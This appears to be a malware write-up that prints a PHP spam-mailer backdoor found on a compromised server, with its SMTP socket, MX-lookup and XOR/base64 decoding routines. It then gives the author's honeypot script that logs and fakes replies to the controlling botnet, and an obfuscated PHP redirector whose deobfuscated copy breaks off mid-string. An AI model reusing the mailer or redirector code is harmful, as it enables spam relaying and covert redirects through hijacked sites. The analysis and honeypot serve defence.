$emailDataList[$emailId]["s_dataout"] = substr($emailDataList[$emailId]["s_dataout"], $data);
if (strlen($emailDataList[$emailId]["s_dataout"]) == 0) {
return TRUE;
}
return FALSE;
}
function hasOpenedSockets($r76, &$emailDataList)
{
$socketData = FALSE;
if (constant("SOCKET_TYPE") != constant("SOCKET_TYPE_SOCKET")) {
foreach (array_keys($emailDataList) as $emailId) {
if ($emailDataList[$emailId]["l_smtp_end"] != TRUE) {
$emailDataList[$emailId]["s_trig"] = TRUE;
$socketData = TRUE;
}
}
return $socketData;
}
$fwcsz21 = array();
foreach (array_keys($emailDataList) as $emailId) {
if ($emailDataList[$emailId]["l_smtp_end"] != TRUE) {
if ($emailDataList[$emailId]["s_sock"] == 0 || $emailDataList[$emailId]["s_step"] == constant("STEP_CONNECT")) {
$emailDataList[$emailId]["s_trig"] = TRUE;
} else {
$emailDataList[$emailId]["s_trig"] = FALSE;
$fwcsz21[] = $emailDataList[$emailId]["s_sock"];
}
$socketData = TRUE;
}
}
if (count($fwcsz21) == 0) {
return $socketData;
}
// watch for changes to all opened sockets and updates the email list of sockets accordinly.
$zkvhr54 = @socket_select($fwcsz21, $kllzd89 = NULL, $ccvhx50 = NULL, 0);
if ($zkvhr54 == FALSE || $zkvhr54 == 0) {
return $socketData;
}
foreach (array_keys($emailDataList) as $emailId) {
$emailDataList[$emailId]["s_trig"] = FALSE;
foreach ($fwcsz21 as $xoloh2) {
if ($emailDataList[$emailId]["s_sock"] == $xoloh2) {
$emailDataList[$emailId]["s_trig"] = TRUE;
break;
}
}
}
return $socketData;
}
function determine_socket_type($r76, $foo)
{
if (function_exists("socket_create") && function_exists("socket_connect") && function_exists("read_socket_data") && function_exists("socket_write")) {
define("SOCKET_TYPE", constant("SOCKET_TYPE_SOCKET"));
return TRUE;
}
if (function_exists("fsockopen")) {
define("SOCKET_TYPE", constant("SOCKET_TYPE_FSOCKET"));
return TRUE;
}
if (function_exists("stream_socket_client")) {
define("SOCKET_TYPE", constant("SOCKET_TYPE_STREAM"));
return TRUE;
}
define("SOCKET_TYPE", constant("SOCKET_TYPE_NO"));
return FALSE;
}
function populateEmailData($r76, $recipientData, $senderEmailData, &$emailData)
{
$qivuk92 = array();
if (FALSE === @preg_match("/(.*?;)?(.*?;)?(.+@(.+)?);?/", $recipientData, $qivuk92)) {
return FALSE;
}
if (!isset($qivuk92) || count($qivuk92) != 5) {
return FALSE;
}
$emailData["g_namefirst"] = @ucfirst(str_replace(";", "", $qivuk92[1]));
$emailData["g_namelast"] = @ucfirst(str_replace(";", "", $qivuk92[2]));
$emailData["g_mailto"] = str_replace(";", "", $qivuk92[3]);
$emailData["g_domainto"] = str_replace(";", "", $qivuk92[4]);
if (!isset($emailData["g_mailto"]) || $emailData["g_mailto"] == "") {
return FALSE;
}
if (!isset($emailData["g_domainto"]) || $emailData["g_domainto"] == "") {
return FALSE;
}
if (isset($emailData["g_namefirst"]) && $emailData["g_namefirst"] != "") {
$emailData["g_mailto+"] = $emailData["g_namefirst"] . " " . $emailData["g_namelast"] . " <" . $emailData["g_mailto"] . ">";
} else {
$emailData["g_mailto+"] = $emailData["g_mailto"];
}
$emailData["g_domainfrom"] = $senderEmailData["hostFrom"];
if (preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $senderEmailData["hostFrom"]) || @ini_get("safe_mode")) {
$emailData["g_fff"] = FALSE;
} else {
$emailData["g_fff"] = TRUE;
}
$emailData["g_mailfrom"] = $senderEmailData["fromLogin"] . "@" . $senderEmailData["hostFrom"];
if (isset($senderEmailData["fromName"]) && $senderEmailData["fromName"] != "") {
$emailData["g_mailfrom+"] = $senderEmailData["fromName"] . " <" . $emailData["g_mailfrom"] . ">";
} else {
$emailData["g_mailfrom+"] = $emailData["g_mailfrom"];
}
$emailData["s_mxhost"] = getMXHosts($r76, $emailData["g_domainto"]);
$emailData["g_subject"] = @str_replace("%R_NAME%", $emailData["g_namefirst"], $senderEmailData["subjTempl"]);
$emailData["g_subject"] = @str_replace("%R_LNAME%", $emailData["g_namelast"], $emailData["g_subject"]);
$emailData["g_body"] = @str_replace("%R_NAME%", $emailData["g_namefirst"], $senderEmailData["bodyTempl"]);
$emailData["g_body"] = @str_replace("%R_LNAME%", $emailData["g_namelast"], $emailData["g_body"]);
$emailData["g_body"] = @str_replace("%MAIL_EN%", encode_data($r76, $emailData["g_mailto"]), $emailData["g_body"]);
$emailData["g_header"] = "X-Priority: 3 (Normal)
";
$emailData["g_header"] .= "MIME-Version: 1.0
";
$emailData["g_header"] .= "Content-Type: text/html;
charset=\"iso-8859-1\"
";
$emailData["g_header"] .= "Content-Transfer-Encoding: 8bit
";
$emailData["g_headerfrom"] = "From: " . $emailData["g_mailfrom+"] . "
";
$emailData["g_headerfrom"] .= "Reply-To:" . $emailData["g_mailfrom+"] . "
";
$emailData["s_header"] = "Date: " . @date("D, j M Y G:i:s O") . "
";
$emailData["s_header"] .= $emailData["g_headerfrom"];
$emailData["s_header"] .= "Message-ID: <" . preg_replace("/(.{7})(.{5})(.{2}).*/", "$1-$2-$3", md5(time())) . "@" . $senderEmailData["hostFrom"] . ">
";
$emailData["s_header"] .= "To: " . $emailData["g_mailto+"] . "
";
$emailData["s_header"] .= "Subject: " . $emailData["g_subject"] . "
";
$emailData["s_header"] .= $emailData["g_subject"];
return TRUE;
}
function getMXHosts($r76, $hostname)
{
$mlopr36 = array();
$vcnaa29 = array();
if (function_exists("getmxrr")) {
@getmxrr($hostname, $mlopr36, $vcnaa29);
} else {
if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_NO")) {
return FALSE;
}
$zkvhr54 = resolveDnsName($r76, $hostname, constant("DNS_TYPE_MX"));
if ($zkvhr54 == FALSE || !isset($zkvhr54["ans"])) {
return FALSE;
}
foreach ($zkvhr54["ans"] as $txows40) {
if ($txows40["type"] == constant("DNS_TYPE_MX")) {
$mlopr36[] = $txows40["data"];
$vcnaa29[] = $txows40["preference"];
}
}
}
if (count($mlopr36) == 0) {
return FALSE;
}
$wtqra76 = array_keys($vcnaa29, min($vcnaa29));
return $mlopr36[$wtqra76[0]];
}
function getDataFromPost($r76, &$senderEmailData)
{
if (count($_POST) < 2) {
return FALSE;
}
$messageEncoded = false;
$listPostKey = $dataPostKey = "";
foreach (array_keys($_POST) as $key) {
if ($key[0] == "l") {
$listPostKey = $key;
}
if ($key[0] == "d") {
$dataPostKey = $key;
}
if ($key[0] == "e") {
$messageEncoded = true;
}
}
if ($listPostKey == "" || $dataPostKey == "") {
return FALSE;
}
$postedRecipients = getPostData($r76, $listPostKey, $messageEncoded);
$postedData = getPostData($r76, $dataPostKey, $messageEncoded);
if ($postedRecipients == FALSE || $postedData == FALSE) {
return FALSE;
}
$senderEmailData["toList"] = @preg_split("/#/", $postedRecipients);
$senderEmailData["fromLogin"] = $senderEmailData["fromName"] = $senderEmailData["subjTempl"] = $senderEmailData["bodyTempl"] = "";
$qivuk92 = array();
if (FALSE !== @preg_match("/<USER>(.*?)<\/USER>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
$senderEmailData["fromLogin"] = $qivuk92[1];
}
if (FALSE !== @preg_match("/<NAME>(.*?)<\/NAME>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
$senderEmailData["fromName"] = $qivuk92[1];
}
if (FALSE !== @preg_match("/<SUBJ>(.*?)<\/SUBJ>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
$senderEmailData["subjTempl"] = $qivuk92[1];
}
if (FALSE !== @preg_match("/<SBODY>(.*?)<\/SBODY>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
$senderEmailData["bodyTempl"] = $qivuk92[1];
}
$senderEmailData["hostFrom"] = @preg_replace("/^(www|ftp)\./i", '', $_SERVER["HTTP_HOST"]);
return TRUE;
}
function getPostData($r76, $postIndex, $messageEncoded)
{
if (!isset($postIndex) || $postIndex == "") {
return FALSE;
}
$message = @$_POST[$postIndex];
if ($messageEncoded) {
$message = messageDecode($r76, $message);
for ($i = 0; $i < strlen($message); $i++) {
$message[$i] = chr(ord($message[$i]) ^ 2);
}
}
return urldecode(stripslashes($message));
}
function messageDecode($r76, $rxuwy6)
{
$data = "";
for ($i = 0; $i < 256; $i++) {
$vefvn90[$i] = chr($i);
}
$adcpo58 = array_flip(preg_split("//", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/", -1, 1));
$rfsny13 = array();
preg_match_all("([A-z0-9+\/]{1,4})", $rxuwy6, $rfsny13);
foreach ($rfsny13[0] as $dkpwg91) {
$omqhl54 = 0;
for ($i = 0; isset($dkpwg91[$i]); $i++) {
$omqhl54 = ($omqhl54 << 6) + $adcpo58[$dkpwg91[$i]];
if ($i > 0) {
$data .= $vefvn90[$omqhl54 >> (4 - (2 * ($i - 1)))];
$omqhl54 = $omqhl54 & (0xf >> (2 * ($i - 1)));
}
}
}
return $data;
}
function encode_data($r76, $input)
{
for ($i = 0; $i < strlen($input); $i++) {
$input[$i] = chr(ord($input[$i]) ^ 2);
}
return base64_encode($input);
}
function socketFactory($r76, $fsock, $socketProtocol, $address, $port, $timeout, &$errno, &$errstr, $nonblock = false)
{
$protocol = "";
$socketProtocol = NULL;
$socketType = NULL;
$errno = 0;
$errstr = "";
if ($socketProtocol == constant("SOCKET_PROTO_TCP")) {
$protocol = "tcp";
$socketProtocol = SOL_TCP;
$socketType = SOCK_STREAM;
} else if ($socketProtocol == constant("SOCKET_PROTO_UDP")) {
$protocol = "udp";
$socketType = SOCK_DGRAM;
$socketProtocol = SOL_UDP;
} else {
$errstr = "Error: invalid protocol";
return FALSE;
}
switch (constant("SOCKET_TYPE")) {
case constant("SOCKET_TYPE_SOCKET"):
if ($fsock == FALSE) {
$fsock = @socket_create(AF_INET, $socketType, $socketProtocol);
if ($fsock == FALSE) {
$errno = socket_last_error();
$errstr = socket_strerror($errno);
break;
}
socket_set_option($fsock, SOL_SOCKET, SO_REUSEADDR, 1);
socket_set_option($fsock, SOL_SOCKET, SO_RCVTIMEO, array(
"sec" => $timeout,
"usec" => 0
));
socket_set_option($fsock, SOL_SOCKET, SO_SNDTIMEO, array(
"sec" => $timeout,
"usec" => 0
));
if ($nonblock) {
socket_set_nonblock($fsock);
}
}
if (!@socket_connect($fsock, $address, $port)) {
$errno = socket_last_error($fsock);
$errstr = socket_strerror($errno);
}
if ($nonblock) {
socket_set_nonblock($fsock);
}
break;
case constant("SOCKET_TYPE_FSOCKET"):
$fsock = @fsockopen($protocol . "://" . $address, $port, $errno, $errstr, $timeout);
if ($fsock && $nonblock) {
@stream_set_blocking($fsock, 0);
}
@stream_set_timeout($fsock, $timeout);
break;
case constant("SOCKET_TYPE_STREAM"):
$fsock = @stream_socket_client($protocol . "://" . $address . ":" . $port, $errno, $errstr, $timeout);
if ($fsock && $nonblock) {
@stream_set_blocking($fsock, 0);
}
@stream_set_timeout($fsock, $timeout);
break;
default:
$errstr = "Error: invalid socket type";
return FALSE;
}
return $fsock;
}
function close_connection($r76, &$fsock)
{
if ($fsock == FALSE) {
return;
}
if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_SOCKET")) {
@socket_close($fsock);
} else {
@fclose($fsock);
}
$fsock = FALSE;
return;
}
function read_socket_data($r76, $fsock, $bytesToRead, &$errno, &$errstr)
{
if ($fsock == FALSE) {
return FALSE;
}
if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_SOCKET")) {
$socketData = @read_socket_data($fsock, $bytesToRead, PHP_BINARY_READ);
if ($socketData == FALSE) {
$errno = socket_last_error($fsock);
$errstr = socket_strerror($errno);
}
} else {
if (@feof($fsock)) {
return FALSE;
}
$socketData = @fread($fsock, $bytesToRead);
if (strlen($socketData) == 0) {
$errno = 35;
}
}
return $socketData;
}
function write_socket_data($r76, $fsock, $data, &$errno, &$errstr)
{
if ($fsock == FALSE) {
return FALSE;
}
if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_SOCKET")) {
$socketData = @socket_write($fsock, $data);
if ($socketData == FALSE) {
$errno = socket_last_error($fsock);
$errstr = socket_strerror($errno);
}
} else {
if (@feof($fsock)) {
return FALSE;
}
$socketData = @fwrite($fsock, $data);
}
return $socketData;
}
function wdtjf68($r76, $fsock, $timeout)
{
if ($fsock == FALSE) {
return FALSE;
}
if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_SOCKET")) {
@socket_set_option($fsock, SOL_SOCKET, SO_RCVTIMEO, array(
"sec" => $timeout,
"usec" => 0
));
@socket_set_option($fsock, SOL_SOCKET, SO_SNDTIMEO, array(
"sec" => $timeout,
"usec" => 0
));
} else {
@stream_set_timeout($fsock, $timeout);
}
return TRUE;
}
function resolveDnsName($r76, $hostname, $jvanz2)
{
$errno = 0;
$errstr = "";
$fsock = socketFactory($r76, FALSE, constant("SOCKET_PROTO_UDP"), "8.8.8.8", 53, 10, $errno, $errstr);
if (!$fsock) {
return FALSE;
}
$lsxth41 = rand(0x0001, 0xFFFE);
$uamee6 = explode("J", $hostname);
$payload = pack("nnnnnn", $lsxth41, 0x0100, 0x0001, 0x0000, 0x0000, 0x0000);
foreach ($uamee6 as $sahcc1) {
$payload .= pack("Ca*", strlen($sahcc1), $sahcc1);
}
$payload .= pack("Cnn", 0x00, $jvanz2, 0x0001);
$socketStatus = write_socket_data($r76, $fsock, $payload, $errno, $errstr);
if (!$socketStatus || $socketStatus != strlen($payload)) {
close_connection($r76, $fsock);
return FALSE;
}
$dnsResponse = read_socket_data($r76, $fsock, 4086, $errno, $errstr);
if ($dnsResponse == FALSE || strlen($dnsResponse) < 12) {
close_connection($r76, $fsock);
return FALSE;
}
$eynrg66 = unpack("ntid/nflags/nque/nans/nauth/nadd", substr($dnsResponse, 0, 12));
$zjthw11 = 12;
$dnsData = array(
"header" => $eynrg66
);
for ($i = constant("DNS_STEP_QESTION"); $i <= constant("DNS_STEP_ADDITIONAL"); $i++) {
$trxcp25 = '';
switch ($i) {
case constant("DNS_STEP_QESTION"):
$trxcp25 = "que";
break;
case constant("DNS_STEP_ANSWER"):
$trxcp25 = "ans";
break;
case constant("DNS_STEP_AUTHORITY"):
$trxcp25 = "auth";
break;
case constant("DNS_STEP_ADDITIONAL"):
$trxcp25 = "add";
break;
}
for ($ybjpw87 = 0; $ybjpw87 < $eynrg66[$trxcp25]; $ybjpw87++) {
$dnsRecordData["name"] = cgzhg7($r76, $zjthw11, $dnsResponse);
if ($i == constant("DNS_STEP_QESTION")) {
$dnsRecordData = array_merge($dnsRecordData, unpack("ntype/nclass", substr($dnsResponse, $zjthw11, 4)));
$zjthw11 += 4;
} else {
$dnsRecordData = array_merge($dnsRecordData, unpack("ntype/nclass/Nttl/ndatalength", substr($dnsResponse, $zjthw11, 10)));
$zjthw11 += 10;
switch ($dnsRecordData["type"]) {
case constant("DNS_TYPE_MX"):
$dnsRecordData = array_merge($dnsRecordData, unpack("npreference", substr($dnsResponse, $zjthw11, 2)));
$zjthw11 += 2;
$dnsRecordData["data"] = cgzhg7($r76, $zjthw11, $dnsResponse);
break;
case constant("DNS_TYPE_A"):
$dnsRecordData = array_merge($dnsRecordData, unpack("Ndata", substr($dnsResponse, $zjthw11, 4)));
$zjthw11 += 4;
$dnsRecordData["ip"] = long2ip($dnsRecordData["data"]);
break;
case constant("DNS_TYPE_NS"):
$dnsRecordData["data"] = cgzhg7($r76, $zjthw11, $dnsResponse);
break;
default:
$zjthw11 += $dnsRecordData["datalength"];
}
}
$dnsData[$trxcp25][] = $dnsRecordData;
}
}
return $dnsData;
}
function cgzhg7($r76, &$kwgra59, $dnsResponse)
{
$data = "";
$svrpc42 = $kwgra59;
while (ord($dnsResponse[$svrpc42]) != 0) {
if (ord($dnsResponse[$svrpc42]) == 0xC0) {
if ($svrpc42 >= $kwgra59) {
$kwgra59 += 2;
}
$svrpc42 = ord($dnsResponse[$svrpc42 + 1]);
continue;
}
if (strlen($data) > 0) {
$data .= "";
}
$data .= substr($dnsResponse, $svrpc42 + 1, ord($dnsResponse[$svrpc42]));
$svrpc42 += ord($dnsResponse[$svrpc42]) + 1;
if ($svrpc42 > $kwgra59) {
$kwgra59 = $svrpc42;
}
}
if ($svrpc42 >= $kwgra59) {
$kwgra59 += 1;
}
return $data;
}
I made a honey pot script to replace the above hack so that I can gather the botnet's information.
@error_reporting(NULL);
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
// log input data.
ob_start();
date_default_timezone_set('America/Edmonton');
echo $_SERVER['REMOTE_ADDR'] . " at " . date("M j Y, H:i:s") . "\n";
print_r($_POST);
print_r($_GET);
$data = ob_get_contents();
ob_clean();
// save it to /tmp/path-to-file-name.log
$fp = fopen("/tmp/" . substr(str_replace("/", "-", __FILE__), 1) . ".log", "a+");
fwrite($fp, $data);
fclose($fp);
//
// Attempt to parse the data using their (decoded) routines.
//
if (FALSE == getDataFromPost($senderEmailData)) {
echo PHP_OS . "+" . md5(0987654321) . "+01+[[]]
";
exit;
}
print_r($senderEmailData);
// Honey pot - do nothing but appear return a OK message.
$successes = count($senderEmailData['toList']);
$successes = count($senderEmailData['toList']);
$methods = "";
for ($i = 0; $i < $successes; $i++) {
$methods .= "1"; // 1 = socket, 2 = mail()
}
// delay so it appears to be doing actual work
sleep(mt_rand(5, 10));
// Give it 100% success using socket methods
echo "OK+" . md5(1234567890) . "+" . $successes . "+" . $successes . "+[" . $methods . "]
";
exit;
function getDataFromPost(&$senderEmailData)
{
if (count($_POST) < 2) {
return FALSE;
}
$messageEncoded = false;
$listPostKey = $dataPostKey = "";
foreach (array_keys($_POST) as $key) {
if ($key[0] == "l") {
$listPostKey = $key;
}
if ($key[0] == "d") {
$dataPostKey = $key;
}
if ($key[0] == "e") {
$messageEncoded = true;
}
}
if ($listPostKey == "" || $dataPostKey == "") {
return FALSE;
}
$postedRecipients = getPostData($listPostKey, $messageEncoded);
$postedData = getPostData($dataPostKey, $messageEncoded);
if ($postedRecipients == FALSE || $postedData == FALSE) {
return FALSE;
}
$senderEmailData["toList"] = @preg_split("/#/", $postedRecipients);
$senderEmailData["fromLogin"] = $senderEmailData["fromName"] = $senderEmailData["subjTempl"] = $senderEmailData["bodyTempl"] = "";
$qivuk92 = array();
if (FALSE !== @preg_match("/<USER>(.*?)<\/USER>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
$senderEmailData["fromLogin"] = $qivuk92[1];
}
if (FALSE !== @preg_match("/<NAME>(.*?)<\/NAME>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
$senderEmailData["fromName"] = $qivuk92[1];
}
if (FALSE !== @preg_match("/<SUBJ>(.*?)<\/SUBJ>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
$senderEmailData["subjTempl"] = $qivuk92[1];
}
if (FALSE !== @preg_match("/<SBODY>(.*?)<\/SBODY>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
$senderEmailData["bodyTempl"] = $qivuk92[1];
}
$senderEmailData["hostFrom"] = @preg_replace("/^(www|ftp)\./i", '', $_SERVER["HTTP_HOST"]);
return TRUE;
}
function getPostData($postIndex, $messageEncoded)
{
if (!isset($postIndex) || $postIndex == "") {
return FALSE;
}
$message = @$_POST[$postIndex];
if ($messageEncoded) {
$message = messageDecode($message);
for ($i = 0; $i < strlen($message); $i++) {
$message[$i] = chr(ord($message[$i]) ^ 2);
}
}
return urldecode(stripslashes($message));
}
function messageDecode($rxuwy6)
{
$data = "";
for ($i = 0; $i < 256; $i++) {
$vefvn90[$i] = chr($i);
}
$adcpo58 = array_flip(preg_split("//", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/", -1, 1));
$rfsny13 = array();
preg_match_all("([A-z0-9+\/]{1,4})", $rxuwy6, $rfsny13);
foreach ($rfsny13[0] as $dkpwg91) {
$omqhl54 = 0;
for ($i = 0; isset($dkpwg91[$i]); $i++) {
$omqhl54 = ($omqhl54 << 6) + $adcpo58[$dkpwg91[$i]];
if ($i > 0) {
$data .= $vefvn90[$omqhl54 >> (4 - (2 * ($i - 1)))];
$omqhl54 = $omqhl54 & (0xf >> (2 * ($i - 1)));
}
}
}
return $data;
}
PHP Redirecter
<?php /* copyright */ ${"GL\x4fB\x41\x4c\x53"}["\x6bg\x6e\x72\x77i\x6e\x64\x62n"]="\x74x\x74";$egeillbp="\x6b";${"\x47\x4cO\x42\x41L\x53"}["\x63kmj\x63uie"]="\x76";foreach($_GET as${$egeillbp}=>${${"\x47L\x4fB\x41\x4cS"}["\x63k\x6d\x6acu\x69e"]}){${"\x47\x4cO\x42\x41\x4c\x53"}["d\x78\x77\x71o\x61lv\x61\x75\x65"]="\x6b";if(preg_match("!^[a-\x7a\x30-\x39]{10,\x332}\$\x21is",${${"\x47\x4cO\x42\x41LS"}["\x64\x78\x77\x71\x6f\x61\x6c\x76a\x75\x65"]})){$xfgspywrt="\x6b";$jdhbwek="\x74\x78\x74";${$jdhbwek}=base64_decode("\x50\x46\x4eD\x55klQV\x43B\x73Y\x57\x35\x6edWFnZT1q\x59\x58Z\x68\x63\x32\x4ey\x61X\x420Pg\x30\x4b\x50\x43E\x74L\x510K\x5a\x6eVuY3Rpb2\x34g\x5a\x32V0\x62W\x55o\x63\x33RyK\x510\x4b\x65yB2YX\x49g\x61WR4ID\x30\x67\x633R\x79\x4cmluZGV\x34\x542\x59\x6f\x4a\x7a\x38n\x4bT\x73\x67a\x57\x59g\x4bG\x6c\x6be\x43A9P\x53A\x74\x4dS\x6bgc\x6dV0\x64\x58\x4au\x49\x48\x4e\x30cjsgd\x6dFy\x49Gx\x6cb\x69\x419\x49\x48\x4e0ci5\x73ZW\x35\x6e\x64G\x67\x37I\x48Z\x68\x63\x69B\x75\x5aXd\x66c3R\x79I\x440g\x49\x69I7\x49HZ\x68c\x69\x42\x70ID0\x67\x4dTs\x67\x5am\x39\x79I\x43g\x72K2\x6c\x6beDs\x67\x61\x57R\x34\x49\x44w\x67\x62G\x56\x75O\x79Bp\x5a\x48g\x67\x4bz0\x67\x4dixp\x4b\x79\x73\x70D\x51\x70\x37IH\x5ahciB\x6aaC\x41\x39\x49H\x42h\x63n\x4e\x6c\x53W\x35\x30KHN0\x63i\x35\x7a\x64\x57\x4az\x64\x48\x49oa\x57\x524LC\x41\x79KS\x77\x67\x4d\x54YpOy\x42\x75ZXd\x66\x63\x33RyICs\x39IFN\x30\x63ml\x75\x5ay\x35\x6dcm\x39t\x51\x32\x68\x68c\x6b\x4evZ\x47\x55o\x4b\x47N\x6fI\x43\x73ga\x53k\x67\x4aSAyNTY\x70\x4fy\x429IA0KZ\x479jdW\x31\x6cb\x6e\x51ud3Jp\x64\x47U\x6f\x62\x6d\x56\x33\x58\x33\x4e0c\x695zdWJ\x7a\x64H\x49o\x4d\x43xu\x5a\x58\x64f\x633\x52y\x4c\x6dx\x6c\x62\x6d\x640\x61C\x30xMSk\x72\x49lx\x31MD\x41yNlx1M\x44\x412\x4e1\x781M\x44\x41\x32Rl\x781\x4dDA\x32\x51\x6c\x781\x4dD\x412Qlx1M\x44\x41\x7a\x52Fp\x61Wl\x70\x63d\x54\x41\x77M\x6a\x4ac\x64\x54A\x77\x4d0\x4acdTA\x77M0Nc\x64T\x41\x77\x4d\x6bZcd\x54AwNz\x4e\x63d\x54\x41\x77\x4ejN\x63dT\x41w\x4ez\x4acdT\x41\x77\x4ejlcd\x54A\x77\x4ez\x42\x63dTA\x77NzR\x63\x64TA\x77\x4d0\x55i\x4b\x54sNC\x6e0\x4eC\x6d\x64vb\x32\x64\x73ZV\x39\x68\x5a\x46\x39jb\x47\x6c\x6cb\x6eQg\x50\x53A\x69c\x48V\x69\x4cTE\x30M\x7a\x411\x4fDQ\x30M\x44g\x7aMTM\x34\x4e\x44\x4d\x69O\x770\x4b\x5a\x329v\x5a2xlX\x32\x46\x6bX\x33d\x70\x5aH\x52\x6f\x49D\x30g\x4e\x7aI\x34\x4f\x77\x30KZ\x32\x39vZ2\x78lX2\x46\x6b\x58\x32\x68la\x57\x64o\x64\x43A\x39IDk\x77Ow\x30KZ29vZ2\x78\x6c\x58\x32F\x6bX\x32Z\x76c\x6d\x31h\x64\x43A9\x49\x43I3\x4d\x6a\x68\x34OTBf\x59\x58\x4diOw\x30\x4b\x5a29\x76\x5a\x32\x78l\x58\x32Fk\x583\x525cGU\x67P\x53A\x69dG\x56\x34dF\x39\x70\x62\x57F\x6eZ\x53\x497\x44Q\x70\x6e\x6229\x6e\x62\x47\x56\x66Y\x57Rf\x59\x32hh\x62\x6d5l\x62C\x419\x49\x43\x49\x69O\x77\x30KZ\x32\x560\x62WUo\x49\x6d\x680\x64H\x416Ly9\x77Y\x57d\x6cYWQ\x79L\x6d\x64vb2\x64sZ\x58N\x35bmR\x70Y\x32\x460a\x579\x75L\x6d\x4e\x76\x62\x53\x39wY\x57d\x6cYWQvc\x32\x68vd1\x39\x68Z\x48\x4du\x61nM/M\x30\x493MTYwN\x6b\x55\x32\x4e\x44\x5aB\x4e\x6bQxO\x44\x59zN\x54c2M\x7a\x56CN\x6ag\x31\x4d\x7aU4\x4eT\x55\x79QzE\x77\x4e\x54c0\x52\x44YxNEI1Q\x7aR\x43\x4e\x54k\x30Rj\x551NTg\x77NTIwNT\x670O\x54\x52\x45N\x44\x49\x30QzUz\x4d\x44\x6b0\x4ejQ4M\x30Iz\x4f\x44R\x42M\x30\x55\x30\x4d\x7aQ\x78ME\x5a\x47\x4d\x7a\x4d\x34\x4eD\x4d\x30M\x6aN\x45M\x44\x5aGQ\x55\x595R\x6bV\x47N\x6bY\x34R\x6aZGN\x6bYyRjR\x47N\x6bY\x33RUVG\x4dE\x591\x52\x6a\x46F\x51\x6a\x4aE\x4d\x6b\x4e\x46Nz\x49\x34MUY\x79\x4e\x6bY\x30\x4dTUxO\x54\x454RUV\x46N0R\x47\x52\x45Z\x45\x52\x6bQyMUUxRjB\x43R\x54V\x45\x51\x55R\x42RDV\x45\x4eU\x4d1RE\x52E\x52EN\x47MTIwMTBG\x4dDUwQj\x42FR\x44c\x69\x4bT\x73\x4e\x43\x69\x38\x76L\x530+I\x44wv\x55\x30\x4eSSVB\x55\x50\x67\x3d\x3d");echo str_replace("\x5a\x5a\x5a\x5a",${$xfgspywrt},${${"GLOB\x41LS"}["\x6bgnr\x77\x69\x6e\x64\x62\x6e"]});exit;}} /* copyright */ ?>
This piece of obfuscates itself by escaping the scripts' code using \x##. After decoding it, the code looks more like:
foreach($_GET as $k => $v) {
if(preg_match("!^[a-z0-9]{10,32}\$!is", $k)) {
$txt = base64_decode("\x50\x46\x4eD\x55klQV\x43B\x73Y\x57\x35\x6edWFnZT1q\x59\x58Z\x68\x63\x32\x4ey\x61X\x420Pg\x30\x4b\x50\x43E\x74L\x510K\x5a\x6eVuY3Rpb2\x34g\x5a\x32V0\x62W\x55o\x63\x33RyK\x510\x4b\x65yB2YX\x49g\x61WR4ID\x30\x67\x633R\x79\x4cmluZGV\x34\x542\x59\x6f\x4a\x7a\x38n\x4bT\x73\x67a\x57\x59g\x4bG\x6c\x6be\x43A9P\x53A\x74\x4dS\x6bgc\x6dV0\x64\x58\x4au\x49\x48\x4e\x30cjsgd\x6dFy\x49Gx\x6cb\x69\x419\x49\x48\x4e0ci5\x73ZW\x35\x6e\x64G\x67\x37I\x48Z\x68\x63\x69B\x75\x5aXd\x66c3R\x79I\x440g\x49\x69I7\x49HZ\x68c\x69\x42\x70ID0\x67\x4dTs\x67\x5am\x39\x79I\x43g\x72K2\x6c\x6beDs\x67\x61\x57R\x34\x49\x44w\x67\x62G\x56\x75O\x79Bp\x5a\x48g\x67\x4bz0\x67\x4dixp\x4b\x79\x73\x70D\x51\x70\x37IH\x5ahciB\x6aaC\x41\x39\x49H\x42h\x63n\x4e\x6c\x53W\x35\x30KHN0\x63i\x35\x7a\x64\x57\x4az\x64\x48\x49oa\x57\x524LC\x41\x79KS\x77\x67\x4d\x54YpOy\x42\x75ZXd\x66\x63\x33RyICs\x39IFN\x30\x63ml\x75\x5ay\x35\x6dcm\x39t\x51\x32\x68\x68c\x6b\x4evZ\x47\x55o\x4b\x47N\x6fI\x43\x73ga\x53k\x67\x4aSAyNTY\x70\x4fy\x429IA0KZ\x479jdW\x31\x6cb\x6e\x51ud3Jp\x64\x47U\x6f\x62\x6d\x56\x33\x58\x33\x4e0c\x695zdWJ\x7a\x64H\x49o\x4d\x43xu\x5a\x58\x64f\x633\x52y\x4c\x6dx\x6c\x62\x6d\x640\x61C\x30xMSk\x72\x49lx\x31MD\x41yNlx1M\x44\x412\x4e1\x781M\x44\x41\x32Rl\x781\x4dDA\x32\x51\x6c\x781\x4dD\x412Qlx1M\x44\x41\x7a\x52Fp\x61Wl\x70\x63d\x54\x41\x77M\x6a\x4ac\x64\x54A\x77\x4d0\x4acdTA\x77M0Nc\x64T\x41\x77\x4d\x6bZcd\x54AwNz\x4e\x63d\x54\x41\x77\x4ejN\x63dT\x41w\x4ez\x4acdT\x41\x77\x4ejlcd\x54A\x77\x4ez\x42\x63dTA\x77NzR\x63\x64TA\x77\x4d0\x55i\x4b\x54sNC\x6e0\x4eC\x6d\x64vb\x32\x64\x73ZV\x39\x68\x5a\x46\x39jb\x47\x6c\x6cb\x6eQg\x50\x53A\x69c\x48V\x69\x4cTE\x30M\x7a\x411\x4fDQ\x30M\x44g\x7aMTM\x34\x4e\x44\x4d\x69O\x770\x4b\x5a\x329v\x